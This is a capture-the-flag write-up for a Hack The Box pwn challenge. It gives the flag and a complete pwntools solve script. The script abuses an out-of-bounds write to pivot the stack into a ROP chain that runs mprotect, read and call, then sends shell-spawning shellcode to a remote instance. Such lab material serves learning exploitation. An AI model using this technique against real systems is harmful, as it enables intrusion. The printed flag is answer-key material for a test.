I see you are new in town adventurer! Here you can pick whatever you want to continue your journey. Need a pet companion? Our arachnoids are the best. Ready to fight? Our pistols are here for you. Lost in time? Our watch will definitely save you!

Category: pwn

Solver: t0b1, s3rp3ntL0v3r

Flag: HTB{00b_4nd_p1v0t_2_th3_st34m_w0rld!}

Writeup

See solve script below.

Solver

from pwn import *

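# Set LOCAL = True to spawn the challenge binary under gdb (in a tmux split,
# see context.terminal) instead of talking to the remote instance.
LOCAL = False
HOST = '167.172.52.221'
PORT = 30371
CHALLENGE = './salesman'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = "info"
# Binding the ELF to context also derives arch/bits from the file, so no
# explicit context.arch setting is needed; `elf` is reused for ROP() below.
context.binary = elf = ELF(CHALLENGE)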

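# Thin I/O wrappers around the global tube `p` (created further down).  Written
# as functions rather than lambda assignments (PEP 8 E731); they look `p` up at
# call time, so it is fine that `p` does not exist yet when they are defined.
# NOTE: `re` shadows the regex module that `from pwn import *` may also bring
# into scope; nothing in this script uses the regex module, but rename this
# helper if that ever changes.
def re(a):
    """Receive up to `a` bytes from the tube."""
    return p.recv(a)


def reu(a):
    """Receive until the delimiter `a` has been seen."""
    return p.recvuntil(a)


def rl():
    """Receive one line."""
    return p.recvline()


def s(a):
    """Send `a` as-is."""
    return p.send(a)


def sl(a):
    """Send `a` followed by a newline."""
    return p.sendline(a)


def sla(a, b):
    """Wait for `a`, then send `b` followed by a newline."""
    return p.sendlineafter(a, b)


def sa(a, b):
    """Wait for `a`, then send `b` as-is."""
    return p.sendafter(a, b)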

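# Connect: a local run spawns the target under gdb, otherwise talk to the
# remote instance.
p = gdb.debug(CHALLENGE, '') if LOCAL else remote(HOST, PORT)

# Stage-1 ROP chain: make the binary's first page RWX, read stage-2 shellcode
# into it, then jump there.  Hard-coding 0x400000 presumes a non-PIE binary
# loaded at the default base; 0x1000 is exactly one page, so mprotect's
# alignment requirement is satisfied.  ROP(elf) can only emit these calls if
# mprotect/read are resolvable through the binary (PLT) -- presumably the case
# for this challenge, since the chain worked against the live instance.
rop = ROP(elf)
rop.mprotect(0x400000, 0x1000, 0x7)
rop.read(0, 0x400000, 0x100)
rop.call(0x400000)

payload = b'A' * 8          # filler up to the saved base pointer
payload += rop.chain()

# Out-of-bounds write at item index -2: this lands on the saved base pointer
# (per the comment in the original solve and the flag's "oob and pivot" hint),
# so the chain runs once the function's epilogue pivots onto it.
# sendline appends '\n'; that is only safe because the target reads the item
# with read()-style semantics rather than stopping at a newline -- if the chain
# ever contains 0x0a bytes and the read is line-oriented, use sa() instead.
sla(b'Item: ', '-2')
sla(b'> ', payload)

# The menu loop keeps its counter relative to $rbp, which now points at
# zero-initialised memory, so the loop runs longer than its nominal two rounds.
# The -2 write above presumably consumed one round; two further dummy rounds
# (three in total) are needed before the function returns into the chain.
EXTRA_ROUNDS = 2
for i in range(EXTRA_ROUNDS):
    info(f'Run {i+1}')
    sla(b'Item: ', '0')
    sla(b'> ', b'a')
info('Done')

# Stage 2: the chain's read() pulls this shellcode into the RWX page and jumps
# to it.  shellcraft.sh() is well under the 0x100 bytes read, and the trailing
# newline from sendline is harmless padding after the code.
shell = asm(shellcraft.sh())
p.sendline(shell)

p.interactive()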